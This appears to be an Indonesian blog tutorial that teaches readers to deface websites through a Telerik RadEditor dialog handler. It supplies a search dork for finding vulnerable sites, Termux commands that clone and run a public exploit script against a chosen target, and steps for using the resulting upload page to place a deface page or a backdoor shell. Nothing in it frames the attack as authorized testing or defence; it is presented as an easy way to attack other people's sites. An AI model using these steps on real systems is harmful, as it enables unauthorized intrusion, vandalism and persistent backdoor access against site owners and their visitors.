Hallo Exploiter,
Kambali lagi sama saya Nararya.
Kali ini kita akan belajar cara deface proof of concept (poc) telerik.

Bahan-bahan:
1. Dork : inurl:/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx
2. Termux
3. Tool Exploiter Telerick

Tutorial :

1. Oke pertama kita pastinya harus ngedork dulu dulu menggunakan dork diatas,

2. Kalau udah dorking, pilih site yg situ anggap vuln, kalau vuln akan ada tulisan "Loading the Dialog..." Seperti gambar berikut.


3. Kemudia kalian buka termux
Lalu install tool Exploiter Telerick dengan perintah berikut.

$ pkg install python2
$ pip2 install requests
$ git clone https://github.com/tnlteam/telerickexploit
$ cd telerickexploit
$ python2 fuck.py -exploit target.com 48 hex 9

Lalu kalian tunggu prosesnya selesai

4. Jika berhasil akan muncul link panjang, seperti dibawah ini.


5. Kalian copy semua dan pastekan Dibrowser kalian.

6. Setelah buka Link nya, maka kalian akan diarahkan ke Uploader/Document Manager, disana ada tombol Upload, kalian klik aja


Lalu kalian upload sc deface kalian atau shell backdoor

Gimana teman teman gampang kan :D

Oke sekian postingan kali ini, jangan lupa tinggalkan komentar dibawah! :D